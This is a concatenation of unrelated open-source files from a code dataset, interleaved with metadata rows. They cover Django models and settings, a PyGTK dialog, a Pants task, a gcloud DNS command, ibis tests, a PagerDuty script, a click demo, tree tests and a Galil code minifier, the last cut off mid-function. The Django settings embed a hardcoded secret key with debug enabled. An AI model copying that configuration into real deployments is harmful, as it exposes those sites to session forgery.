| mit | -1,281,120,865,517,804,500 | 27.715976 | 78 | 0.564187 | false |
jamessqr/james-squires-dotcom | blog/models.py | 1 | 1065 | from django.db import models
import datetime
class Category(models.Model):
title = models.CharField(max_length=250, help_text='Maximum 250 characters')
slug = models.SlugField()
description = models.TextField()
class Meta:
ordering = ['title']
verbose_name_plural = "Categories"
class Admin:
pass
#TODO: This does not work!
#class CategoryAdmin(admin.ModelAdmin):
#prepopulated_fields = {"slug": ("title",)}
def __unicode__(self):
return self.title
def get_absolulte_url(self):
return "/categories/%s/" % self.slug
class Entry(models.Model):
title = models.CharField(max_length=250, help_text='Maximum 250 characters')
excerpt = models.TextField(blank=True)
body = models.TextField()
slug = models.SlugField()
pub_date = models.DateTimeField(default=datetime.datetime.now)
class Meta:
ordering = ['title']
verbose_name_plural = "Entries"
class Admin:
pass
def __unicode__(self):
return self.title
def get_absolute_url(self):
return "/%s/%s" % (self.pub_date.strftime("%Y/%m/%d").lower(),self.slug) | bsd-3-clause | -5,629,373,321,651,460,000 | 23.227273 | 77 | 0.694836 | false |
daniel-e/papershelf | dialogs/settings.py | 1 | 2638 | import pygtk
pygtk.require('2.0')
import gtk
class DialogSettings(gtk.Dialog):
def __init__(self, title, parent, flag, settings):
gtk.Dialog.__init__(self, title, parent, flag)
s = settings
self.s = s
t = gtk.Table(rows = 3, columns = 3)
t.set_col_spacings(10)
t.set_row_spacings(10)
l = gtk.Label("PDF Viewer:")
l.set_alignment(xalign = 1.0, yalign = 0.5)
t.attach(l, 0, 1, 0, 1)
l.show()
l = gtk.Entry()
l.set_width_chars(40)
l.set_text(s.vars["pdfviewer"])
l.set_alignment(xalign = 0.0)
t.attach(l, 1, 2, 0, 1)
l.show()
self.pdf_viewer = l
l = gtk.Label("PDF Location:")
l.set_alignment(xalign = 1.0, yalign = 0.5)
t.attach(l, 0, 1, 1, 2)
l.show()
l = gtk.Entry()
l.set_width_chars(40)
l.set_text(s.vars["pdflocation"])
l.set_alignment(xalign = 0.0)
t.attach(l, 1, 2, 1, 2)
l.show()
self.pdf_location = l
b = gtk.Button("Choose")
b.show()
b.connect("clicked", self.choose_pdf_location, None)
t.attach(b, 2, 3, 1, 2)
# ----
l = gtk.Label("Preview converter:")
l.set_alignment(xalign = 1.0, yalign = 0.5)
t.attach(l, 0, 1, 2, 3)
l.show()
l = gtk.Entry()
l.set_width_chars(40)
l.set_text(s.vars["pdfconvert"])
l.set_alignment(xalign = 0.0)
t.attach(l, 1, 2, 2, 3)
l.show()
self.pdf_convert = l
b = gtk.Button("Choose")
b.show()
b.connect("clicked", self.choose_pdf_convert, None)
t.attach(b, 2, 3, 2, 3)
# ----
self.vbox.pack_start(t)
t.show()
self.add_button("Ok", 1)
self.add_button("Cancel", 2)
def show(self):
if self.run() == 1:
s = self.s
s.vars["pdfviewer"] = self.pdf_viewer.get_text()
s.vars["pdflocation"] = self.pdf_location.get_text()
s.vars["pdfconvert"] = self.pdf_convert.get_text()
s.commit()
self.destroy()
def choose_pdf_location(self, widget, data = None):
f = gtk.FileChooserDialog("Select a directory", self,
buttons = (gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL, gtk.STOCK_OPEN, gtk.RESPONSE_OK))
f.set_action(gtk.FILE_CHOOSER_ACTION_SELECT_FOLDER)
r = f.run()
if r == gtk.RESPONSE_OK:
self.pdf_location.set_text(f.get_current_folder())
f.destroy()
def choose_pdf_convert(self, widget, data = None):
f = gtk.FileChooserDialog("Select an executable", self,
buttons = (gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL, gtk.STOCK_OPEN, gtk.RESPONSE_OK))
#f.set_action(gtk.FILE_CHOOSER_ACTION_SELECT_FOLDER)
r = f.run()
if r == gtk.RESPONSE_OK:
self.pdf_convert.set_text(f.get_filename())
f.destroy()
| gpl-2.0 | 9,119,678,909,674,186,000 | 26.768421 | 89 | 0.590978 | false |
PAHB/SIgma-Nu-idea-1 | Backend_stuff/sigma_nu/sigma_nu/settings.py | 1 | 3345 | """
Django settings for sigma_nu project.
Generated by 'django-admin startproject' using Django 1.9.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
PROJECT_PATH = os.path.realpath(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'd8&u=e=t2&3qdmj^eq*!+r^79sske#)2uul@4i98jhb)z*alsk'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'sigma_nu.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
'C:\Users\hightower\Desktop\Sigma Nu\SIgma-Nu-idea-1'
#need to update this when deployed
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'sigma_nu.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| apache-2.0 | -8,023,671,557,027,920,000 | 25.76 | 91 | 0.686398 | false |
lahosken/pants | src/python/pants/core_tasks/what_changed.py | 1 | 2061 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.base.deprecated import deprecated
from pants.scm.subsystems.changed import Changed
from pants.task.console_task import ConsoleTask
# TODO: Remove this entire file in 1.5.0dev0.
class WhatChanged(ConsoleTask):
"""Emits the targets that have been modified since a given commit."""
@classmethod
def register_options(cls, register):
super(WhatChanged, cls).register_options(register)
# N.B. The bulk of options relevant to this task now come from the `Changed` subsystem.
register('--files', type=bool, removal_version='1.5.0dev0',
help='Show changed files instead of the targets that own them.',
removal_hint='Use your scm implementation (e.g. `git diff --stat`) instead.')
@classmethod
def subsystem_dependencies(cls):
return super(WhatChanged, cls).subsystem_dependencies() + (Changed.Factory,)
@deprecated('1.5.0dev0', 'Use e.g. `./pants --changed-parent=HEAD list` instead.',
'`./pants changed`')
def console_output(self, _):
# N.B. This task shares an options scope ('changed') with the `Changed` subsystem.
options = self.get_options()
changed = Changed.Factory.global_instance().create(options)
change_calculator = changed.change_calculator(
build_graph=self.context.build_graph,
address_mapper=self.context.address_mapper,
scm=self.context.scm,
workspace=self.context.workspace,
# N.B. `exclude_target_regexp` is a global scope option registered elsewhere.
exclude_target_regexp=options.exclude_target_regexp
)
if options.files:
for f in sorted(change_calculator.changed_files()):
yield f
else:
for addr in sorted(change_calculator.changed_target_addresses()):
yield addr.spec
| apache-2.0 | -6,841,545,234,120,318,000 | 41.061224 | 93 | 0.700631 | false |
flgiordano/netcash | +/google-cloud-sdk/lib/surface/dns/managed_zones/create.py | 1 | 2431 | # Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""gcloud dns managed-zone create command."""
from googlecloudsdk.api_lib.dns import util
from googlecloudsdk.calliope import base
from googlecloudsdk.core import list_printer
from googlecloudsdk.core import log
class Create(base.Command):
"""Create a Cloud DNS managed-zone.
This command creates a Cloud DNS managed-zone.
"""
detailed_help = {
'DESCRIPTION': '{description}',
'EXAMPLES': """\
To create a managed-zone, run:
$ {command} my_zone --dns_name my.zone.com. --description "My zone!"
""",
}
@staticmethod
def Args(parser):
parser.add_argument('dns_zone',
metavar='ZONE_NAME',
help='Name of the managed-zone to be created.')
parser.add_argument(
'--dns-name',
required=True,
help='The DNS name suffix that will be managed with the created zone.')
parser.add_argument('--description',
required=True,
help='Short description for the managed-zone.')
@util.HandleHttpError
def Run(self, args):
dns = self.context['dns_client']
messages = self.context['dns_messages']
resources = self.context['dns_resources']
zone_ref = resources.Parse(args.dns_zone, collection='dns.managedZones')
zone = messages.ManagedZone(name=zone_ref.managedZone,
dnsName=util.AppendTrailingDot(args.dns_name),
description=args.description)
result = dns.managedZones.Create(
messages.DnsManagedZonesCreateRequest(managedZone=zone,
project=zone_ref.project))
log.CreatedResource(zone_ref)
return result
def Display(self, args, result):
list_printer.PrintResourceList('dns.managedZones', [result])
| bsd-3-clause | 7,825,775,985,124,091,000 | 34.231884 | 80 | 0.65364 | false |
cpcloud/ibis | ibis/expr/tests/test_schema.py | 1 | 4977 | import ibis
from ibis.expr import datatypes as dt
def test_whole_schema():
customers = ibis.table(
[
('cid', 'int64'),
('mktsegment', 'string'),
(
'address',
(
'struct<city: string, street: string, '
'street_number: int32, zip: int16>'
),
),
('phone_numbers', 'array<string>'),
(
'orders',
"""array<struct<
oid: int64,
status: string,
totalprice: decimal(12, 2),
order_date: string,
items: array<struct<
iid: int64,
name: string,
price: decimal(12, 2),
discount_perc: decimal(12, 2),
shipdate: string
>>
>>""",
),
(
'web_visits',
(
'map<string, struct<user_agent: string, '
'client_ip: string, visit_date: string, '
'duration_ms: int32>>'
),
),
(
'support_calls',
(
'array<struct<agent_id: int64, '
'call_date: string, duration_ms: int64, '
'issue_resolved: boolean, '
'agent_comment: string>>'
),
),
],
name='customers',
)
expected = ibis.Schema.from_tuples(
[
('cid', dt.int64),
('mktsegment', dt.string),
(
'address',
dt.Struct.from_tuples(
[
('city', dt.string),
('street', dt.string),
('street_number', dt.int32),
('zip', dt.int16),
]
),
),
('phone_numbers', dt.Array(dt.string)),
(
'orders',
dt.Array(
dt.Struct.from_tuples(
[
('oid', dt.int64),
('status', dt.string),
('totalprice', dt.Decimal(12, 2)),
('order_date', dt.string),
(
'items',
dt.Array(
dt.Struct.from_tuples(
[
('iid', dt.int64),
('name', dt.string),
('price', dt.Decimal(12, 2)),
(
'discount_perc',
dt.Decimal(12, 2),
),
('shipdate', dt.string),
]
)
),
),
]
)
),
),
(
'web_visits',
dt.Map(
dt.string,
dt.Struct.from_tuples(
[
('user_agent', dt.string),
('client_ip', dt.string),
('visit_date', dt.string),
('duration_ms', dt.int32),
]
),
),
),
(
'support_calls',
dt.Array(
dt.Struct.from_tuples(
[
('agent_id', dt.int64),
('call_date', dt.string),
('duration_ms', dt.int64),
('issue_resolved', dt.boolean),
('agent_comment', dt.string),
]
)
),
),
]
)
assert customers.schema() == expected
def test_schema_subset():
s1 = ibis.schema([('a', dt.int64), ('b', dt.int32), ('c', dt.string)])
s2 = ibis.schema([('a', dt.int64), ('c', dt.string)])
assert s1 > s2
assert s2 < s1
assert s1 >= s2
assert s2 <= s1
def test_empty_schema():
schema = ibis.schema([])
result = repr(schema)
expected = """\
ibis.Schema {
}"""
assert result == expected
| apache-2.0 | -8,713,466,511,553,539,000 | 31.960265 | 74 | 0.277275 | false |
Lao-liu/mist.io | setup.py | 1 | 1324 | import os
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
README = open(os.path.join(here, 'README.txt')).read()
CHANGES = open(os.path.join(here, 'CHANGES.txt')).read()
requires = []
setup(name='mist.io',
version='0.9.9',
license='AGPLv3',
description='server management, monitoring & automation across clouds from any web device',
long_description=README + '\n\n' + CHANGES,
classifiers=[
"Programming Language :: Python",
"Framework :: Pylons",
"Topic :: Internet :: WWW/HTTP",
"License :: OSI Approved :: GNU Affero General Public License v3",
"Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
],
author='mist.io',
author_email='[email protected]',
url='https://mist.io',
keywords='web cloud server management monitoring automation mobile libcloud pyramid amazon aws rackspace openstack linode softlayer digitalocean gce',
packages=find_packages('src'),
package_dir={'': 'src'},
namespace_packages=['mist'],
include_package_data=True,
zip_safe=False,
install_requires=requires,
tests_require=requires,
test_suite="mist.io",
entry_points="""\
[paste.app_factory]
main = mist.io:main
""",
)
| agpl-3.0 | 4,312,459,541,311,082,000 | 32.948718 | 156 | 0.624622 | false |
edunham/toys | pd/resolve.py | 1 | 1132 | #!/usr/bin/env python3
# based on example from https://github.com/PagerDuty/API_Python_Examples/tree/master/EVENTS_API_v2
import json
import requests
import os
import sys
ROUTING_KEY = os.environ['PAGERDUTY_SERVICE_KEY']
INCIDENT_KEY = sys.argv[1]
def resolve_incident():
# Triggers a PagerDuty incident without a previously generated incident key
# Uses Events V2 API - documentation: https://v2.developer.pagerduty.com/docs/send-an-event-events-api-v2
header = {
"Content-Type": "application/json"
}
payload = { # Payload is built with the least amount of fields required to trigger an incident
"routing_key": ROUTING_KEY,
"event_action": "resolve",
"dedup_key": INCIDENT_KEY
}
response = requests.post('https://events.pagerduty.com/v2/enqueue',
data=json.dumps(payload),
headers=header)
if response.json()["status"] == "success":
print('Incident Resolved ')
else:
print(response.text) # print error message if not successful
if __name__ == '__main__':
resolve_incident()
| mit | 1,053,160,661,838,398,100 | 28.789474 | 109 | 0.64576 | false |
nditech/elections | apollo/locations/__init__.py | 1 | 4175 | from apollo.core import Service, cache
from apollo.locations.models import Sample, LocationType, Location
import unicodecsv
try:
from cStringIO import StringIO
except:
from StringIO import StringIO
class SamplesService(Service):
__model__ = Sample
class LocationTypesService(Service):
__model__ = LocationType
def root(self):
# a raw query is needed because querying 'normally'
# (i.e.: ancestors_ref=[]) will raise an exception
# about an invalid ObjectID
return self.find(__raw__={'ancestors_ref': []}).first()
class LocationsService(Service):
__model__ = Location
def root(self):
# a raw query is needed because querying 'normally'
# (i.e.: ancestors_ref=[]) will raise an exception
# about an invalid ObjectID
return self.find(__raw__={'ancestors_ref': []}).first()
@cache.memoize(timeout=86400)
def registered_voters_map(self):
'''
This method computes a map of location ids and the corresponding
number of registered voters and cache the result for a day.
'''
eligible_location_types = LocationTypesService().find(
has_registered_voters=True).scalar('name')
return {pk: rv for (pk, rv) in self.find(
location_type__in=eligible_location_types).scalar(
'pk', 'registered_voters')}
def export_list(self, queryset):
headers = []
location_types = list(LocationTypesService().find().order_by(
'ancestors_ref'))
for location_type in location_types:
location_name = location_type.name.upper()
headers.append('{}_N'.format(location_name))
headers.append('{}_ID'.format(location_name))
if location_type.has_political_code:
headers.append('{}_PCODE'.format(location_name))
if location_type.has_registered_voters:
headers.append('{}_RV'.format(location_name))
for metafield in location_type.metafields:
headers.append('{}_{}'.format(
location_name, metafield.upper()
))
output = StringIO()
writer = unicodecsv.writer(output, encoding='utf-8')
writer.writerow([unicode(i) for i in headers])
yield output.getvalue()
output.close()
if queryset.count() < 1:
yield
else:
locations = queryset
locations = locations.order_by('code')
for location in locations:
record = []
for location_type in location_types:
try:
this_location = filter(
lambda l: l.location_type == location_type.name,
location.ancestors_ref
).pop()
except IndexError:
if location.location_type == location_type.name:
this_location = location
else:
this_location = None
record.append(this_location.name or ''
if this_location else '')
record.append(this_location.code or ''
if this_location else '')
if location_type.has_political_code:
record.append(this_location.political_code or ''
if this_location else '')
if location_type.has_registered_voters:
record.append(this_location.registered_voters or ''
if this_location else '')
for metafield in location_type.metafields:
record.append(getattr(this_location, metafield, '')
if this_location else '')
output = StringIO()
writer = unicodecsv.writer(output, encoding='utf-8')
writer.writerow([unicode(i) for i in record])
yield output.getvalue()
output.close()
| gpl-3.0 | 3,217,432,549,554,864,600 | 39.144231 | 76 | 0.535329 | false |
mehdy/click-pug | tehpug.py | 1 | 2029 | # coding: utf-8
#
# ==========================================
# Developed by Mehdy Khoshnoody =
# Contact @ [email protected] =
# More info @ http://mehdy.net =
# ==========================================
#
__author__ = 'mehdy'
import click
def version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
click.echo('version 1.0')
ctx.exit()
def validate(ctx, param, value):
if value < 19:
click.echo('You are not authoriazed to attend. you must be at least 18.')
ctx.exit()
else:
return
@click.group()
@click.option('--version', callback=version, expose_value=False, is_flag=True, is_eager=True)
def main():
'''
This a detail section for the app
'''
pass
@main.command()
@click.option('--name', '-n', default='tehpug', type=click.STRING, help='enter your name')
@click.option('--age', '-a', default=15, callback=validate, help='enter your age')
@click.option('--attend/--not-attend', default=False)
@click.argument('out', type=click.File('w'), required=False)
@click.option('--group', type=click.Choice(['flask','django','click']), default='flask')
def pug(name, age, attend, out, group):
'''
this a help message for pug
'''
if out:
if not attend:
click.echo('Why???', out)
click.echo('hello %s, you are %s years old.\nwelcome to PUG' %(name, age), out)
click.echo('you are member of %s subgroup in pug.' %group, out)
else:
if not attend:
click.echo('Why???')
click.echo('hello %s, you are %s years old.\nwelcome to PUG' % (name, age))
click.echo('you are member of %s subgroup in pug.' % group)
@main.command()
@click.option('--name', '-n', default='tehpug', type=click.STRING, help='enter your name')
@click.option('--age', '-a', default=15, help='enter your age')
def lug(name, age):
'''
and a help message for lug
'''
click.echo('hello %s, you are %s years old.\nwelcome to LUG' %(name, age)) | gpl-2.0 | -5,895,680,206,538,094,000 | 31.222222 | 93 | 0.580089 | false |
brownnrl/moneyguru | core/tests/gui/tree_test.py | 1 | 3347 | # Copyright 2018 Virgil Dupras
#
# This software is licensed under the "GPLv3" License as described in the "LICENSE" file,
# which should be included with this package. The terms are also available at
# http://www.gnu.org/licenses/gpl-3.0.html
from core.tests.testutil import eq_
from core.gui.tree import Tree, Node
def tree_with_some_nodes():
t = Tree()
t.append(Node('foo'))
t.append(Node('bar'))
t.append(Node('baz'))
t[0].append(Node('sub1'))
t[0].append(Node('sub2'))
return t
def test_selection():
t = tree_with_some_nodes()
assert t.selected_node is None
eq_(t.selected_nodes, [])
assert t.selected_path is None
eq_(t.selected_paths, [])
def test_select_one_node():
t = tree_with_some_nodes()
t.selected_node = t[0][0]
assert t.selected_node is t[0][0]
eq_(t.selected_nodes, [t[0][0]])
eq_(t.selected_path, [0, 0])
eq_(t.selected_paths, [[0, 0]])
def test_select_one_path():
t = tree_with_some_nodes()
t.selected_path = [0, 1]
assert t.selected_node is t[0][1]
def test_select_multiple_nodes():
t = tree_with_some_nodes()
t.selected_nodes = [t[0], t[1]]
eq_(t.selected_paths, [[0], [1]])
def test_select_multiple_paths():
t = tree_with_some_nodes()
t.selected_paths = [[0], [1]]
eq_(t.selected_nodes, [t[0], t[1]])
def test_select_none_path():
# setting selected_path to None clears the selection
t = Tree()
t.selected_path = None
assert t.selected_path is None
def test_select_none_node():
# setting selected_node to None clears the selection
t = Tree()
t.selected_node = None
eq_(t.selected_nodes, [])
def test_clear_removes_selection():
# When clearing a tree, we want to clear the selection as well or else we end up with a crash
# when calling selected_paths.
t = tree_with_some_nodes()
t.selected_path = [0]
t.clear()
assert t.selected_node is None
def test_selection_override():
# All selection changed pass through the _select_node() method so it's easy for subclasses to
# customize the tree's behavior.
class MyTree(Tree):
called = False
def _select_nodes(self, nodes):
self.called = True
t = MyTree()
t.selected_paths = []
assert t.called
t.called = False
t.selected_node = None
assert t.called
def test_findall():
t = tree_with_some_nodes()
r = t.findall(lambda n: n.name.startswith('sub'))
eq_(set(r), set([t[0][0], t[0][1]]))
def test_findall_dont_include_self():
# When calling findall with include_self=False, the node itself is never evaluated.
t = tree_with_some_nodes()
del t._name # so that if the predicate is called on `t`, we crash
r = t.findall(lambda n: not n.name.startswith('sub'), include_self=False) # no crash
eq_(set(r), set([t[0], t[1], t[2]]))
def test_find_dont_include_self():
# When calling find with include_self=False, the node itself is never evaluated.
t = tree_with_some_nodes()
del t._name # so that if the predicate is called on `t`, we crash
r = t.find(lambda n: not n.name.startswith('sub'), include_self=False) # no crash
assert r is t[0]
def test_find_none():
# when find() yields no result, return None
t = Tree()
assert t.find(lambda n: False) is None # no StopIteration exception
| gpl-3.0 | 9,161,680,050,084,443,000 | 30.280374 | 97 | 0.638781 | false |
duelafn/python-galil-apci | galil_apci/file.py | 1 | 15100 | # -*- coding: utf-8 -*-
"""Simple galil file templating and minification
Preforms useful actions on galil encoder files.
- Substitution of template variables (using jinja2)
- Whitespace trimming and minification by command packing
"""
# Author: Dean Serenevy <[email protected]>
# This software is Copyright (c) 2013 APCI, LLC.
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division, absolute_import, print_function
import re
import logging
logger = logging.getLogger(__name__)
import galil_apci
import jinja2
import collections
from jinja2_apci import RequireExtension, RaiseExtension
import math
axis2idx = { "A": 0, "B": 1, "C": 2, "D": 3,
"E": 4, "F": 5, "G": 6, "H": 7,
"X": 0, "Y": 1, "Z": 2, "W": 3
}
def param_list(params):
"""
Produces string appropriate for a galil parameter list for a set of axes.
Setting a number of values at once sometimes requires issuing a command
with a single positional list of values for each axis. For example::
JG val1,val2,...
This can be difficult if the axis numbers are parameters. This function
will produce a list from a dictionary of axes (numerical or letters)::
JG{{ param_list({ "A": 60*4096, "B": 60*4096 }) }}
JG{{ param_list({ "0": 60*4096, "1": 60*4096 }) }}
JG{{ param_list({ primary.axis: "^a*" ~ primary.counts, secondary.axis: "^a*" ~ secondary.counts }) }}
"""
a = [""] * 8
for (k, v) in params.iteritems():
a[int(axis2idx.get(k, k))] = str(v)
i = 7
while i >= 0:
if a[i] == '':
i -= 1
else:
break
if i < 0:
raise Exception("No values in the parameter list: {}".format(str(params)))
return ",".join(a[0:i+1])
def build_commander(fmt):
"""
Convenience method which constructs list of formatted commands when
passed a list of arguments.
E.g.,::
HX = build_commander("HX{}")
print( HX(1,2,3) ) # prints HX1;HX2;HX3
"""
def cmd(*args):
return ";".join([ fmt.format(x) for x in args ])
return cmd
def sin(theta):
"""sin function taking degree arguments"""
return math.sin(math.pi * theta/180)
def asin(h):
"""asin function returning degrees"""
return 180 * math.asin(h) / math.pi
def cos(theta):
"""cos function taking degree arguments"""
return math.cos(math.pi * theta/180)
def acos(h):
"""acos function returning degrees"""
return 180 * math.acos(h) / math.pi
class GalilFile(object):
@classmethod
def add_globals(cls, g):
g["string_to_galil_hex"] = galil_apci.Galil.string_to_galil_hex
g["galil_hex_to_string"] = galil_apci.Galil.galil_hex_to_string
g["galil_hex_to_binary"] = galil_apci.Galil.galil_hex_to_binary
g["round_galil"] = galil_apci.Galil.round
g["axis2idx"] = axis2idx
g["param_list"] = param_list
g["HX"] = build_commander("HX{}")
g["SB"] = build_commander("SB{}")
g["CB"] = build_commander("CB{}")
g["max"] = max
g["min"] = min
g["int"] = int
g["sin"] = sin
g["asin"] = asin
g["cos"] = cos
g["acos"] = acos
def __init__(self, path=None, package=None, line_length=79):
"""
@param path: If a path (array of directories) is provided, it will
be prepended to the template search path. The default path is
the "gal" folder in the apci module directory.
@param line_length: Galil maximum line length. 79 for most boards,
but some are capped at 39.
"""
self.line_length = line_length
loaders = []
if path:
loaders.append(jinja2.FileSystemLoader(path, encoding='utf-8'))
if package:
loaders.append(jinja2.PackageLoader(package, 'gal', encoding='utf-8'))
def finalize(value):
if value is None:
print("Use of undefined value in template!")
return "None"
else:
return value
self.env = jinja2.Environment(
extensions=[RequireExtension, RaiseExtension],
loader=jinja2.ChoiceLoader(loaders),
undefined=jinja2.StrictUndefined,
finalize=finalize,
)
GalilFile.add_globals(self.env.globals)
def load(self, name, context):
"""Renders and minifies a template"""
return self.minify( self.render(name, context) )
def lint(self, content, warnings=False):
"""
Performs a lint check on the galil code
- long lines, too-long strings
- duplicate labels / forgotten C{JS}, C{JS} or C{JP} to non-existant labels
- C{_JS} or C{()} used in sub argument, inconsistent sub arity
- Double equals ("=="), Not equals ("!=")
- presence of "None" anywhere in the code
- [warning] unused labels
NOT IMPLEMENTED / TODO:
- long variable names
- external JP targets
- C{SHA}, C{_GRB}, ... (axes outside of braces, should be C{SHE{lb}E{lb}AE{rb}E{rb}} and C{_GRE{lb}E{lb}BE{rb}E{rb}})
- uninitialized variables (variables not initialized in any #xxINIT)
"""
content = self.minify(content)
errors = []
# WARNING: Any trailing semicolon/EOL checks need to be zero-width assertions
p_sub_def = re.compile(r"(?:^|;)(#[a-zA-Z0-9_]{1,7})")
p_sub_arg = re.compile(r"""
(?:^|;)
(?:J[SP]|XQ) (\#[a-zA-Z0-9_]{1,7}) # jump name
((?:\(.*?\))?) # optional arguments
(?= ; | $ # endl
| , \( # complex condition
| , (?:\d+|\^[a-h]|\w{1,8}) (?:;|$) # thread number
)
""", re.X)
p_bad_ops = re.compile(r"(?:==|!=)")
p_JS = re.compile(r"_JS")
p_if_js = re.compile(r"(?:^|;)IF\([^;\n]+\)[;\n](J[SP]#[a-zA-Z]+)[^;\n]*[;\n]ENDIF", re.M)
# Dangerous to have any calculation in an argument. Only want variables.
# warning: won't catch @ABS[foo]
p_danger_arg = re.compile(r"(?:.(?:\(|\)).|[^a-zA-Z0-9.,@\[\]_\(\)\^\&\"\-]|(?<![\(,])\-)")
pc_MG = re.compile(r"^MG")
subs = set()
sub_line = {}
sub_arity = {}
sub_neg1_dflt = set(("#ok", "#error"))
AUTO_subs = set(["#AUTO", "#MCTIME", "#AMPERR", "#AUTOERR", "#POSERR", "#CMDERR"])
JSP_sub = set()
JSP_line = collections.defaultdict(list)
if warnings:
for jump in p_if_js.findall(content):
errors.append( "IF(...);{} better written as {},(...)".format(jump, jump) )
lineno = 0
for line in content.split("\n"):
lineno += 1
# presence of None
if "None" in line:
errors.append( "line {}, Contains 'None', check template vars: {}".format(lineno, line) )
# long lines
if len(line) > self.line_length:
errors.append( "line {}, Line too long: {}".format(lineno, line) )
# Bad operators
if p_bad_ops.search(line):
errors.append( "line {}, bad operator: {}".format(lineno, line) )
# for duplicate labels
for name in p_sub_def.findall(line):
if name in subs:
errors.append( "line {}, Duplicate label: {}".format(lineno, name) )
else:
subs.add(name)
sub_line[name] = lineno
# examine subroutine arguments (JS, JP)
# also for unused labels and jumps to non-existant labels
for name, arg in p_sub_arg.findall(line):
# Note: arg includes "()"
JSP_sub.add(name)
JSP_line[name].append(lineno)
args = [] if len(arg) < 3 else arg.split(',')
if name in sub_neg1_dflt and arg == "(-1)":
# Make exception for #ok and #error
pass
elif name in sub_arity:
if len(args) != sub_arity[name]:
errors.append( "line {}, inconsistent sub arity for {}. Was {} now {}".format(lineno, name, sub_arity[name], len(args)) )
else:
sub_arity[name] = len(args)
if p_JS.search(arg):
errors.append( "line {}, _JS used in subroutine argument: {}".format(lineno, line) )
if p_danger_arg.search(arg):
errors.append( "line {}, Dangerous value (calculation) used in argument: {}".format(lineno, line) )
for cmd in line.split(";"):
# long strings
if not pc_MG.search(cmd):
strings = cmd.split('"')
for idx in (x for x in xrange(1, len(strings), 2) if len(strings[x]) > 5):
errors.append( "line {}, Long string '{}' in command: {}".format(lineno, strings[idx], cmd) )
# jumps to non-existant labels
for sub in JSP_sub - subs:
errors.append( "line(s) {}, J[SP]{} found but label {} not defined".format(JSP_line[sub], sub, sub) )
if warnings:
# unused labels
for sub in subs - JSP_sub - AUTO_subs:
errors.append( "line {}, Label {} defined but never used".format(sub_line[sub], sub) )
return errors
def minify(self, content):
"""
Performs minification on a galil file. Actions performed:
- Strips all comments
- trims space after semicolon and before/after various ops (" = ", "IF (...)")
- Merges "simple" lines (up to line_length)
"""
lines = []
double_semi = re.compile(r';(\s*)(?=;)')
line_end_semi = re.compile(r';$')
# Comments: ', NO, REM. Do NOT need to check for word boundaries ("NOTE" is a comment)
#
# WARNING: This is INCORRECT! In galil a semicolon ends a comment
# - this is crazy so I explicitly choose to have a comment kill
# the rest of the line
comment = re.compile(r"(?:^|;)\s*(?:'|NO|REM).*")
# Operators with wrapped space. Match will be replaced with \1.
operator_spaces = re.compile(r"\s*([,;=\+\-*/%<>\(\)\[\]&|]|<>|>=|<=)\s*")
